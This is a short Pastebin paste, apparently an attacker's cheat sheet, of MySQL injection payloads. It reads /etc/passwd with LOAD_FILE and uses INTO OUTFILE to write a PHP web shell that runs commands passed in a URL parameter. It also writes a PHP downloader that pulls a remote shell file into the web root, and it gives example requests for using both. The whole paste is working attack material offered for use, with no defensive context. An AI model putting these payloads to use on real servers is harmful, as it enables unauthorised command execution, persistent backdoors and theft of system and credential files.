Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- "Reading Files from query"
- SELECT LOAD_FILE('/etc/passwd');
- ---------------------------------------------------------------------------------
- "Writing Files from query"
- To write a PHP shell:
- SELECT '<? system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php';
- and then access it at:
- http://localhost/shell.php?c=cat%20/etc/passwd
- To write a downloader:
- SELECT '<? fwrite(fopen($_GET[f], \'w\'), file_get_contents($_GET[u])); ?>' INTO OUTFILE '/var/www/get.php'
- and then access it at:
- http://localhost/get.php?f=shell.php&u=http://localhost/c99.txt
- -----------------------------------------------------------------------------------
Add Comment
Please, Sign In to add comment